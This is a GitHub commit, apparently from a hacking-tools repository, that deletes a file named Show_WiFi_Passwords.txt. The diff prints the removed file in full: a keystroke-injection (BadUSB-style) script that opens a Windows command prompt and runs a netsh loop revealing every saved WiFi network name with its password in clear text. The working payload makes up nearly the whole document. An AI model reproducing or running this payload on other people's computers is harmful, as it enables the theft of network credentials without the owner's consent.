Delete Show_WiFi_Passwords.txt

This commit is contained in:
UberGuidoZ 2022-07-10 00:29:11 -07:00 committed by GitHub
parent 5e51f71cc6
commit e61bd5779d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -1,10 +0,0 @@
DELAY 2000
GUI r
DELAY 1000
STRING cmd
DELAY 500
ENTER
DELAY 1500
STRING for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | netsh wlan show profiles %j key=clear | findstr /C:"SSID name" /C:"Key Content"
DELAY 250
ENTER